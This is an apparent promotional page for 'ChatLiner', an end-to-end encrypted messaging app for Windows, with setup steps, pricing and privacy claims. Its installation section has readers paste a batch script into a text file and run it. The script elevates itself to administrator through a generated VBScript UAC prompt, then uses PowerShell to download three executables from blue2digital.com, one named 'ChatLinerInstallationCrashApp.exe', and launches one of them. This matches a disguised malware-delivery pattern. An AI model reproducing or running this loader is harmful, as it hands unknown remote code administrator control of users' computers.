#To use the ChatLiner app without any hassle, be sure to read the following:
1
ChatLiner is a software designed to work on a computer running the Microsoft Windows operating system.
Download ChatLiner and install it on your PC.
2
Open the app and create a username of your choice, or create a group if you want to share files and messages with more people at the same time.
3
When a new user (or group) is created, a unique digital ID card associated with that user (or group) name is automatically generated.
You will be required to attach and verify your card each time you wish to log into the system or change your user details.
Please keep this file private and do not share it with anyone.
4
By default, the digital ID card is stored in the C:/digital-identity-card folder.
You can leave it there or save it to another folder or device as you see fit (your phone, for example).
Make sure you remember the location of your digital ID card so you can use it later.
This document cannot expire, but it also cannot be revoked, renewed or recreated if lost or deleted, nor can it be repaired and reused if corrupted.
5
Before you open a chat room for the first time, make sure you have generated a cryptographic key pair consisting of a public key and a private key and assigned it to your user or group name.
There is no limit to the number of key pairs you can generate. You can even use a different key pair with each new chat.
Just like your digital ID card, keep your private key secret - don't display it publicly or share it with anyone.
6
The keys are responsible for encrypting and decrypting the files and messages you exchange within ChatLiner.
With the help of the public key, you will encrypt the files and messages you send to the interlocutor, while the private key will enable the decryption of the files and messages sent to you.
7
Optionally, you can add more useful details to your profile (such as your full name, a little more about yourself, and a profile picture) unless you want to remain completely anonymous.
8
Find the person you want to chat with and share data with. This means you need to know that person's username.
9
Enter the chat room. Confirm your private key.
10
If you are chatting within a group, you will need to have the DCCL and RSA private keys associated with that group in order to access files and messages shared therein.
These keys are provided by the group creator.
11
Start texting to one or more recipients. To send files, you must enter the appropriate PIN.
You do not need to enter a PIN when downloading files.
12
You can log out and log back in from time to time. Your interlocutor will be notified of any changes in your online status.
13
You can also record and send an encrypted audio (voice) message. This message is encrypted before being sent and only the recipient (i.e. the person to whom the message is addressed) can decrypt and play it back using their private key.
14
Once ChatLiner is closed, no instances of this program will remain active.
This means that ChatLiner does not run in the background and does not collect data from your computer without your knowledge.
15
That's all it takes to get started with ChatLiner. If you have any questions or issues, feel free to send us a message.
#To download and install the ChatLiner app safely and quickly, be sure to take the steps as follows:
1
Open a blank page in one of the popular word processors, such as NotePad, Notepad++ or WordPad.
2
Click the "Copy Text" button and copy the text inside the blue box (below the button) into one of the word processors listed above.
The copied content represents the source code of the installation file.
@echo off
title CHATLINER INSTALLER
set "params=%*"
cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) && fsutil dirty query %systemdrive% 1>nul 2>nul || ( echo Set UAC = CreateObject^("Shell.Application"^) : UAC.ShellExecute "cmd.exe", "/k cd ""%~sdp0"" && %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" && "%temp%\getadmin.vbs" && exit /B )
SETLOCAL EnableDelayedExpansion
for /F "tokens=1,2 delims=#" %%a in ('"prompt #$H#$E# & echo on & for %%b in (1) do rem"') do (
set "DEL=%%a"
)
echo.
call :ColorText 0e "+ INSTALLING CHATLINER"
echo.
echo.
call :ColorText 0f "Do not close this window"
echo ...
echo.
goto :END
:ColorText
echo off
"%~2"
findstr /v /a:%1 /R "^$" "%~2" nul
del "%~2" > nul 2>&1
goto :eof
:END
if not exist "C:\chatliner" mkdir C:\chatliner
echo en > "C:\chatliner\language.gmb"
powershell.exe wget https://blue2digital.com/downloads/server.xml -OutFile C:/chatliner/server.xml
powershell.exe wget https://blue2digital.com/downloads/ChatLinerInstallationCrashApp.exe -OutFile C:/chatliner/ChatLinerInstallationCrashApp.exe
powershell.exe wget https://blue2digital.com/downloads/ChatLinerInstallation.exe -OutFile C:/chatliner/ChatLinerInstallation.exe
start "" "C:\chatliner\ChatLinerInstallation.exe"
call :ColorText 0b "OK. This script is closing now"
echo ...
echo.
echo.
ping 127.0.0.1 -n 3 > nul
exit
3
Save the file as a "batch" script with the extension .BAT. You can name it "installer.bat", for example, or you can give it any other name.
The saved batch file is the ChatLiner application installation file.
4
Double-click the saved file and wait a few seconds for the installation to begin. You will also need to accept the terms of use of this software (the so-called License Agreement).
5
After the installation is complete, you will be able to launch ChatLiner and start using it right away.
6
That's all it takes to download and install the ChatLiner app. If you have any questions or issues, feel free to send us a message.
#Pay annually for unlimited use
Sending text and audio messages through ChatLiner is free of charge. You can send an unlimited number of messages.
File sharing through ChatLiner costs $100 per year.
You can send an unlimited number of files. A 30-50% discount is possible in case of multiple user registrations.
Payment via PayPal is recommended.
If you want to make the payment in another way, please contact us so that we can send you the necessary instructions.
Once the payment is completed, you will receive a PIN code that you should keep secret. The PIN code is for your personal and private use only.
There are no additional costs or hidden fees.
#Your privacy remains guaranteed
The data entered during payment have nothing to do with the use of the app itself.
To use ChatLiner, you need to choose a unique username and generate a pair of crypto keys, while each individual user is assigned a digital ID card for identity verification.
You will never be asked for any sensitive or personal information and this is a policy that ChatLiner will always adhere to.
#ChatLiner End User License Agreement
By using this software ("Software", or "ChatLiner") owned by VIDYPS 79 d.o.o. ("Licensor"), you acknowledge and agree that the License Agreement sets out the business relationship between you and Licensor.
Visit this page for more information.
#End-to-end encryption in the truest sense of the word: ChatLiner, at your service
#ChatLiner is a messaging platform with end-to-end encryption that ensures authentic encryption of transferred files and messages and prevents their modification, loss, damage or misuse.
There is no compromising, interception or collection of users' personal data or sensitive data from users' devices.